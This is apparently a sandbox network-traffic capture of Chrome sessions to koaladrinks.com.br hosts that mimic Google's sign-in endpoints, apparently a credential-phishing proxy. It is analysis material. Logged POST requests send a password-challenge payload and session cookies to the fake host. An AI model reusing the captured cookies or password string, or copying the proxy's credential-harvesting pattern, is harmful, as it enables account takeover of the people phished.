                                                      2025-01-10 08:28:05 UTC24INData Raw: 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 72 69 76 61 74 65 0d 0a
                                                      Data Ascii: Cache-Control: private
                                                      2025-01-10 08:28:05 UTC19INData Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a
                                                      Data Ascii: Connection: close
                                                      2025-01-10 08:28:05 UTC41INData Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a
                                                      Data Ascii: Content-Type: text/plain; charset=UTF-8
                                                      2025-01-10 08:28:05 UTC44INData Raw: 43 72 6f 73 73 2d 4f 72 69 67 69 6e 2d 52 65 73 6f 75 72 63 65 2d 50 6f 6c 69 63 79 3a 20 63 72 6f 73 73 2d 6f 72 69 67 69 6e 0d 0a
                                                      Data Ascii: Cross-Origin-Resource-Policy: cross-origin
                                                      2025-01-10 08:28:05 UTC37INData Raw: 44 61 74 65 3a 20 46 72 69 2c 20 31 30 20 4a 61 6e 20 32 30 32 35 20 30 38 3a 32 38 3a 30 35 20 47 4d 54 0d 0a
                                                      Data Ascii: Date: Fri, 10 Jan 2025 08:28:05 GMT


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      85192.168.2.949816139.59.30.1934432960C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-10 08:28:07 UTC666OUTGET /log?format=json&hasfast=true&authuser=0 HTTP/1.1
                                                      Host: play.koaladrinks.com.br
                                                      Connection: keep-alive
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      Accept: */*
                                                      Sec-Fetch-Site: none
                                                      Sec-Fetch-Mode: cors
                                                      Sec-Fetch-Dest: empty
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      Cookie: 801d-ce4a=a5d2d70dc467bcf857f4f208b24b4950de24cb3d2e90ac6adc868997a5f27202; NID=520=cyJ_sMpBkONW3ni1Q0FYfGRliLqtCJwmS0LiNbbh_1WIfY8dYaHqKXeCbJazrbUkofnU-WjvPG3LQQnBu1rIENmajUB5whDCPc5KWwSk6dJkbn8W0pIa_EobNSW4rrZovmDTiPLGQQZ3G38UVESzjDntnuCnoB89Ola69XbU3Yd59C2vK4TNNfqZVQ
                                                      2025-01-10 08:28:07 UTC26INHTTP/1.1 400 Bad Request
                                                      2025-01-10 08:28:07 UTC57INData Raw: 41 6c 74 2d 53 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 32 35 39 32 30 30 30 2c 68 33 2d 32 39 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 32 35 39 32 30 30 30 0d 0a
                                                      Data Ascii: Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      2025-01-10 08:28:07 UTC35INData Raw: 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6e 6f 2d 73 74 6f 72 65 0d 0a
                                                      Data Ascii: Cache-Control: no-cache, no-store
                                                      2025-01-10 08:28:07 UTC19INData Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a
                                                      Data Ascii: Connection: close
                                                      2025-01-10 08:28:07 UTC40INData Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a
                                                      Data Ascii: Content-Type: text/html; charset=UTF-8
                                                      2025-01-10 08:28:07 UTC37INData Raw: 44 61 74 65 3a 20 46 72 69 2c 20 31 30 20 4a 61 6e 20 32 30 32 35 20 30 38 3a 32 38 3a 30 37 20 47 4d 54 0d 0a
                                                      Data Ascii: Date: Fri, 10 Jan 2025 08:28:07 GMT
                                                      2025-01-10 08:28:07 UTC17INData Raw: 53 65 72 76 65 72 3a 20 50 6c 61 79 6c 6f 67 0d 0a
                                                      Data Ascii: Server: Playlog
                                                      2025-01-10 08:28:07 UTC28INData Raw: 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a
                                                      Data Ascii: Transfer-Encoding: chunked
                                                      2025-01-10 08:28:07 UTC2INData Raw: 0d 0a
                                                      Data Ascii:
                                                      2025-01-10 08:28:07 UTC5INData Raw: 36 34 39 0d 0a
                                                      Data Ascii: 649
                                                      2025-01-10 08:28:07 UTC1609INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 30 20 28 42 61 64 20 52 65 71 75 65 73 74 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d
                                                      Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 400 (Bad Request)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      86192.168.2.949817139.59.30.1934432960C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-10 08:28:07 UTC1828OUTPOST /v3/signin/_/AccountsSignInUi/data/batchexecute?rpcids=B4hajb&source-path=%2Fv3%2Fsignin%2Fchallenge%2Fpwd&f.sid=-3172993228359564282&bl=boq_identityfrontendauthuiserver_20250105.08_p0&hl=en&TL=AO-GBTeOPSBKWx6KOWwqKt4fYNm6VaeGpN7ldDzfG2E16DR1jOu6Lh9CEdomjH5B&_reqid=412469&rt=c HTTP/1.1
                                                      Host: ijgbload.koaladrinks.com.br
                                                      Connection: keep-alive
                                                      Content-Length: 4166
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      x-goog-ext-278367001-jspb: ["GlifWebSignIn"]
                                                      X-Same-Domain: 1
                                                      x-goog-ext-391502476-jspb: ["S1847760580:1736497656249061",null,null,"AVdkyDlGhnItroLAC3si_mqULQOt4JsDQW8FBnibx9rAmyc2QgdpVgDNlU-QpphCVCgezxOaVMxZ"]
                                                      sec-ch-ua-mobile: ?0
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      sec-ch-ua-arch: "x86"
                                                      Content-Type: application/x-www-form-urlencoded;charset=UTF-8
                                                      sec-ch-ua-full-version: "117.0.5938.134"
                                                      sec-ch-ua-platform-version: "10.0.0"
                                                      sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"
                                                      sec-ch-ua-bitness: "64"
                                                      sec-ch-ua-model: ""
                                                      sec-ch-ua-wow64: ?0
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept: */*
                                                      Origin: https://ijgbload.koaladrinks.com.br
                                                      Sec-Fetch-Site: same-origin
                                                      Sec-Fetch-Mode: cors
                                                      Sec-Fetch-Dest: empty
                                                      Referer: https://ijgbload.koaladrinks.com.br/
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      Cookie: 801d-ce4a=a5d2d70dc467bcf857f4f208b24b4950de24cb3d2e90ac6adc868997a5f27202; __Host-GAPS=1:3-UTC4SFRFjKOB1Be52QGuvKCrHSyw:Y_T9kLgzI5emAt_J; OTZ=7903228_76_76_104100_72_446760; NID=520=cyJ_sMpBkONW3ni1Q0FYfGRliLqtCJwmS0LiNbbh_1WIfY8dYaHqKXeCbJazrbUkofnU-WjvPG3LQQnBu1rIENmajUB5whDCPc5KWwSk6dJkbn8W0pIa_EobNSW4rrZovmDTiPLGQQZ3G38UVESzjDntnuCnoB89Ola69XbU3Yd59C2vK4TNNfqZVQ
                                                      2025-01-10 08:28:07 UTC4166OUTData Raw: 66 2e 72 65 71 3d 25 35 42 25 35 42 25 35 42 25 32 32 42 34 68 61 6a 62 25 32 32 25 32 43 25 32 32 25 35 42 31 25 32 43 31 25 32 43 6e 75 6c 6c 25 32 43 25 35 42 31 25 32 43 6e 75 6c 6c 25 32 43 6e 75 6c 6c 25 32 43 6e 75 6c 6c 25 32 43 25 35 42 25 35 43 25 32 32 45 6b 68 50 47 54 4d 25 32 35 66 41 77 4e 6b 25 32 36 30 72 25 32 35 25 35 43 25 32 32 25 32 43 6e 75 6c 6c 25 32 43 31 25 35 44 25 35 44 25 32 43 25 35 42 25 35 44 25 32 43 6e 75 6c 6c 25 32 43 25 35 42 25 35 42 25 35 42 25 35 43 25 32 32 54 4c 25 35 43 25 32 32 25 32 43 25 35 43 25 32 32 41 4f 2d 47 42 54 65 4f 50 53 42 4b 57 78 36 4b 4f 57 77 71 4b 74 34 66 59 4e 6d 36 56 61 65 47 70 4e 37 6c 64 44 7a 66 47 32 45 31 36 44 52 31 6a 4f 75 36 4c 68 39 43 45 64 6f 6d 6a 48 35 42 25 35 43 25 32 32
                                                      Data Ascii: f.req=%5B%5B%5B%22B4hajb%22%2C%22%5B1%2C1%2Cnull%2C%5B1%2Cnull%2Cnull%2Cnull%2C%5B%5C%22EkhPGTM%25fAwNk%260r%25%5C%22%2Cnull%2C1%5D%5D%2C%5B%5D%2Cnull%2C%5B%5B%5B%5C%22TL%5C%22%2C%5C%22AO-GBTeOPSBKWx6KOWwqKt4fYNm6VaeGpN7ldDzfG2E16DR1jOu6Lh9CEdomjH5B%5C%22
                                                      2025-01-10 08:28:09 UTC17INHTTP/1.1 200 OK
                                                      2025-01-10 08:28:09 UTC205INData Raw: 41 63 63 65 70 74 2d 43 68 3a 20 53 65 63 2d 43 48 2d 55 41 2d 41 72 63 68 2c 20 53 65 63 2d 43 48 2d 55 41 2d 42 69 74 6e 65 73 73 2c 20 53 65 63 2d 43 48 2d 55 41 2d 46 75 6c 6c 2d 56 65 72 73 69 6f 6e 2c 20 53 65 63 2d 43 48 2d 55 41 2d 46 75 6c 6c 2d 56 65 72 73 69 6f 6e 2d 4c 69 73 74 2c 20 53 65 63 2d 43 48 2d 55 41 2d 4d 6f 64 65 6c 2c 20 53 65 63 2d 43 48 2d 55 41 2d 57 6f 57 36 34 2c 20 53 65 63 2d 43 48 2d 55 41 2d 46 6f 72 6d 2d 46 61 63 74 6f 72 73 2c 20 53 65 63 2d 43 48 2d 55 41 2d 50 6c 61 74 66 6f 72 6d 2c 20 53 65 63 2d 43 48 2d 55 41 2d 50 6c 61 74 66 6f 72 6d 2d 56 65 72 73 69 6f 6e 0d 0a
                                                      Data Ascii: Accept-Ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                      2025-01-10 08:28:09 UTC57INData Raw: 41 6c 74 2d 53 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 32 35 39 32 30 30 30 2c 68 33 2d 32 39 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 32 35 39 32 30 30 30 0d 0a
                                                      Data Ascii: Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      2025-01-10 08:28:09 UTC35INData Raw: 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6e 6f 2d 73 74 6f 72 65 0d 0a
                                                      Data Ascii: Cache-Control: no-cache, no-store
                                                      2025-01-10 08:28:09 UTC19INData Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a
                                                      Data Ascii: Connection: close
                                                      2025-01-10 08:28:09 UTC89INData Raw: 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 61 74 74 61 63 68 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 72 65 73 70 6f 6e 73 65 2e 62 69 6e 22 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 55 54 46 2d 38 27 27 72 65 73 70 6f 6e 73 65 2e 62 69 6e 0d 0a
                                                      Data Ascii: Content-Disposition: attachment; filename="response.bin"; filename*=UTF-8''response.bin
                                                      2025-01-10 08:28:09 UTC47INData Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 73 6f 6e 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a
                                                      Data Ascii: Content-Type: application/json; charset=utf-8
                                                      2025-01-10 08:28:09 UTC83INData Raw: 43 72 6f 73 73 2d 4f 72 69 67 69 6e 2d 4f 70 65 6e 65 72 2d 50 6f 6c 69 63 79 2d 52 65 70 6f 72 74 2d 4f 6e 6c 79 3a 20 73 61 6d 65 2d 6f 72 69 67 69 6e 3b 20 72 65 70 6f 72 74 2d 74 6f 3d 22 41 63 63 6f 75 6e 74 73 53 69 67 6e 49 6e 55 69 22 0d 0a
                                                      Data Ascii: Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="AccountsSignInUi"
                                                      2025-01-10 08:28:09 UTC41INData Raw: 43 72 6f 73 73 2d 4f 72 69 67 69 6e 2d 52 65 73 6f 75 72 63 65 2d 50 6f 6c 69 63 79 3a 20 73 61 6d 65 2d 73 69 74 65 0d 0a
                                                      Data Ascii: Cross-Origin-Resource-Policy: same-site
                                                      2025-01-10 08:28:09 UTC37INData Raw: 44 61 74 65 3a 20 46 72 69 2c 20 31 30 20 4a 61 6e 20 32 30 32 35 20 30 38 3a 32 38 3a 30 39 20 47 4d 54 0d 0a
                                                      Data Ascii: Date: Fri, 10 Jan 2025 08:28:09 GMT


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      87192.168.2.949818139.59.30.1934432960C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-10 08:28:07 UTC1291OUTPOST /log?format=json&hasfast=true&authuser=0 HTTP/1.1
                                                      Host: play.koaladrinks.com.br
                                                      Connection: keep-alive
                                                      Content-Length: 598
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      sec-ch-ua-mobile: ?0
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      sec-ch-ua-arch: "x86"
                                                      Content-Type: application/x-www-form-urlencoded;charset=UTF-8
                                                      sec-ch-ua-full-version: "117.0.5938.134"
                                                      sec-ch-ua-platform-version: "10.0.0"
                                                      X-Goog-AuthUser: 0
                                                      sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"
                                                      sec-ch-ua-bitness: "64"
                                                      sec-ch-ua-model: ""
                                                      sec-ch-ua-wow64: ?0
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept: */*
                                                      Origin: https://ijgbload.koaladrinks.com.br
                                                      Sec-Fetch-Site: same-site
                                                      Sec-Fetch-Mode: cors
                                                      Sec-Fetch-Dest: empty
                                                      Referer: https://ijgbload.koaladrinks.com.br/
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      Cookie: 801d-ce4a=a5d2d70dc467bcf857f4f208b24b4950de24cb3d2e90ac6adc868997a5f27202; NID=520=cyJ_sMpBkONW3ni1Q0FYfGRliLqtCJwmS0LiNbbh_1WIfY8dYaHqKXeCbJazrbUkofnU-WjvPG3LQQnBu1rIENmajUB5whDCPc5KWwSk6dJkbn8W0pIa_EobNSW4rrZovmDTiPLGQQZ3G38UVESzjDntnuCnoB89Ola69XbU3Yd59C2vK4TNNfqZVQ
                                                      2025-01-10 08:28:07 UTC598OUTData Raw: 5b 5b 31 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 5b 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 22 65 6e 22 2c 6e 75 6c 6c 2c 22 34 31 22 2c 6e 75 6c 6c 2c 5b 5b 5b 22 47 6f 6f 67 6c 65 20 43 68 72 6f 6d 65 22 2c 22 31 31 37 22 5d 2c 5b 22 4e 6f 74 3b 41 3d 42 72 61 6e 64 22 2c 22 38 22 5d 2c 5b 22 43 68 72 6f 6d 69 75 6d 22 2c 22 31 31 37 22 5d 5d 2c 30 2c 22 57 69 6e 64 6f 77 73 22 2c 22 31 30 2e 30 2e 30 22 2c 22 78 38 36 22 2c 22 22 2c 22 31 31 37 2e 30 2e 35 39 33 38 2e 31 33 34 22 5d 2c 5b 31 2c 30 2c 30 2c 30 2c 30 5d 5d 5d 2c 31 38 32 38 2c 5b 5b 22 31 37 33 36 34 39 37 36 38 35 34 39 32 22 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c
                                                      Data Ascii: [[1,null,null,null,null,null,null,null,null,null,[null,null,null,null,"en",null,"41",null,[[["Google Chrome","117"],["Not;A=Brand","8"],["Chromium","117"]],0,"Windows","10.0.0","x86","","117.0.5938.134"],[1,0,0,0,0]]],1828,[["1736497685492",null,null,null
                                                      2025-01-10 08:28:07 UTC17INHTTP/1.1 200 OK
                                                      2025-01-10 08:28:07 UTC40INData Raw: 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 43 72 65 64 65 6e 74 69 61 6c 73 3a 20 74 72 75 65 0d 0a
                                                      Data Ascii: Access-Control-Allow-Credentials: true
                                                      2025-01-10 08:28:07 UTC45INData Raw: 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 48 65 61 64 65 72 73 3a 20 58 2d 50 6c 61 79 6c 6f 67 2d 57 65 62 0d 0a
                                                      Data Ascii: Access-Control-Allow-Headers: X-Playlog-Web
                                                      2025-01-10 08:28:07 UTC66INData Raw: 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 68 74 74 70 73 3a 2f 2f 69 6a 67 62 6c 6f 61 64 2e 6b 6f 61 6c 61 64 72 69 6e 6b 73 2e 63 6f 6d 2e 62 72 0d 0a
                                                      Data Ascii: Access-Control-Allow-Origin: https://ijgbload.koaladrinks.com.br
                                                      2025-01-10 08:28:07 UTC57INData Raw: 41 6c 74 2d 53 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 32 35 39 32 30 30 30 2c 68 33 2d 32 39 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 32 35 39 32 30 30 30 0d 0a
                                                      Data Ascii: Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      2025-01-10 08:28:07 UTC19INData Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a
                                                      Data Ascii: Connection: close
                                                      2025-01-10 08:28:07 UTC41INData Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a
                                                      Data Ascii: Content-Type: text/plain; charset=UTF-8
                                                      2025-01-10 08:28:07 UTC44INData Raw: 43 72 6f 73 73 2d 4f 72 69 67 69 6e 2d 52 65 73 6f 75 72 63 65 2d 50 6f 6c 69 63 79 3a 20 63 72 6f 73 73 2d 6f 72 69 67 69 6e 0d 0a
                                                      Data Ascii: Cross-Origin-Resource-Policy: cross-origin
                                                      2025-01-10 08:28:07 UTC37INData Raw: 44 61 74 65 3a 20 46 72 69 2c 20 31 30 20 4a 61 6e 20 32 30 32 35 20 30 38 3a 32 38 3a 30 37 20 47 4d 54 0d 0a
                                                      Data Ascii: Date: Fri, 10 Jan 2025 08:28:07 GMT
                                                      2025-01-10 08:28:07 UTC17INData Raw: 53 65 72 76 65 72 3a 20 50 6c 61 79 6c 6f 67 0d 0a
                                                      Data Ascii: Server: Playlog


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      88192.168.2.949819139.59.30.1934432960C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-10 08:28:08 UTC666OUTGET /log?format=json&hasfast=true&authuser=0 HTTP/1.1
                                                      Host: play.koaladrinks.com.br
                                                      Connection: keep-alive
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      Accept: */*
                                                      Sec-Fetch-Site: none
                                                      Sec-Fetch-Mode: cors
                                                      Sec-Fetch-Dest: empty
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      Cookie: 801d-ce4a=a5d2d70dc467bcf857f4f208b24b4950de24cb3d2e90ac6adc868997a5f27202; NID=520=cyJ_sMpBkONW3ni1Q0FYfGRliLqtCJwmS0LiNbbh_1WIfY8dYaHqKXeCbJazrbUkofnU-WjvPG3LQQnBu1rIENmajUB5whDCPc5KWwSk6dJkbn8W0pIa_EobNSW4rrZovmDTiPLGQQZ3G38UVESzjDntnuCnoB89Ola69XbU3Yd59C2vK4TNNfqZVQ
                                                      2025-01-10 08:28:09 UTC26INHTTP/1.1 400 Bad Request
                                                      2025-01-10 08:28:09 UTC57INData Raw: 41 6c 74 2d 53 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 32 35 39 32 30 30 30 2c 68 33 2d 32 39 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 32 35 39 32 30 30 30 0d 0a
                                                      Data Ascii: Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      2025-01-10 08:28:09 UTC35INData Raw: 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6e 6f 2d 73 74 6f 72 65 0d 0a
                                                      Data Ascii: Cache-Control: no-cache, no-store
                                                      2025-01-10 08:28:09 UTC19INData Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a
                                                      Data Ascii: Connection: close
                                                      2025-01-10 08:28:09 UTC40INData Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a
                                                      Data Ascii: Content-Type: text/html; charset=UTF-8
                                                      2025-01-10 08:28:09 UTC37INData Raw: 44 61 74 65 3a 20 46 72 69 2c 20 31 30 20 4a 61 6e 20 32 30 32 35 20 30 38 3a 32 38 3a 30 39 20 47 4d 54 0d 0a
                                                      Data Ascii: Date: Fri, 10 Jan 2025 08:28:09 GMT
                                                      2025-01-10 08:28:09 UTC17INData Raw: 53 65 72 76 65 72 3a 20 50 6c 61 79 6c 6f 67 0d 0a
                                                      Data Ascii: Server: Playlog
                                                      2025-01-10 08:28:09 UTC28INData Raw: 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a
                                                      Data Ascii: Transfer-Encoding: chunked
                                                      2025-01-10 08:28:09 UTC2INData Raw: 0d 0a
                                                      Data Ascii:
                                                      2025-01-10 08:28:09 UTC5INData Raw: 36 34 39 0d 0a
                                                      Data Ascii: 649
                                                      2025-01-10 08:28:09 UTC1609INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 30 20 28 42 61 64 20 52 65 71 75 65 73 74 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d
                                                      Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 400 (Bad Request)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      89192.168.2.949821139.59.30.1934432960C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-10 08:28:11 UTC1006OUTGET /v3/signin/_/AccountsSignInUi/data/batchexecute?rpcids=B4hajb&source-path=%2Fv3%2Fsignin%2Fchallenge%2Fpwd&f.sid=-3172993228359564282&bl=boq_identityfrontendauthuiserver_20250105.08_p0&hl=en&TL=AO-GBTeOPSBKWx6KOWwqKt4fYNm6VaeGpN7ldDzfG2E16DR1jOu6Lh9CEdomjH5B&_reqid=412469&rt=c HTTP/1.1
                                                      Host: ijgbload.koaladrinks.com.br
                                                      Connection: keep-alive
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      Accept: */*
                                                      Sec-Fetch-Site: none
                                                      Sec-Fetch-Mode: cors
                                                      Sec-Fetch-Dest: empty
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      Cookie: 801d-ce4a=a5d2d70dc467bcf857f4f208b24b4950de24cb3d2e90ac6adc868997a5f27202; __Host-GAPS=1:3-UTC4SFRFjKOB1Be52QGuvKCrHSyw:Y_T9kLgzI5emAt_J; OTZ=7903228_76_76_104100_72_446760; NID=520=cyJ_sMpBkONW3ni1Q0FYfGRliLqtCJwmS0LiNbbh_1WIfY8dYaHqKXeCbJazrbUkofnU-WjvPG3LQQnBu1rIENmajUB5whDCPc5KWwSk6dJkbn8W0pIa_EobNSW4rrZovmDTiPLGQQZ3G38UVESzjDntnuCnoB89Ola69XbU3Yd59C2vK4TNNfqZVQ
                                                      2025-01-10 08:28:11 UTC33INHTTP/1.1 405 Method Not Allowed
                                                      2025-01-10 08:28:11 UTC205INData Raw: 41 63 63 65 70 74 2d 43 68 3a 20 53 65 63 2d 43 48 2d 55 41 2d 41 72 63 68 2c 20 53 65 63 2d 43 48 2d 55 41 2d 42 69 74 6e 65 73 73 2c 20 53 65 63 2d 43 48 2d 55 41 2d 46 75 6c 6c 2d 56 65 72 73 69 6f 6e 2c 20 53 65 63 2d 43 48 2d 55 41 2d 46 75 6c 6c 2d 56 65 72 73 69 6f 6e 2d 4c 69 73 74 2c 20 53 65 63 2d 43 48 2d 55 41 2d 4d 6f 64 65 6c 2c 20 53 65 63 2d 43 48 2d 55 41 2d 57 6f 57 36 34 2c 20 53 65 63 2d 43 48 2d 55 41 2d 46 6f 72 6d 2d 46 61 63 74 6f 72 73 2c 20 53 65 63 2d 43 48 2d 55 41 2d 50 6c 61 74 66 6f 72 6d 2c 20 53 65 63 2d 43 48 2d 55 41 2d 50 6c 61 74 66 6f 72 6d 2d 56 65 72 73 69 6f 6e 0d 0a
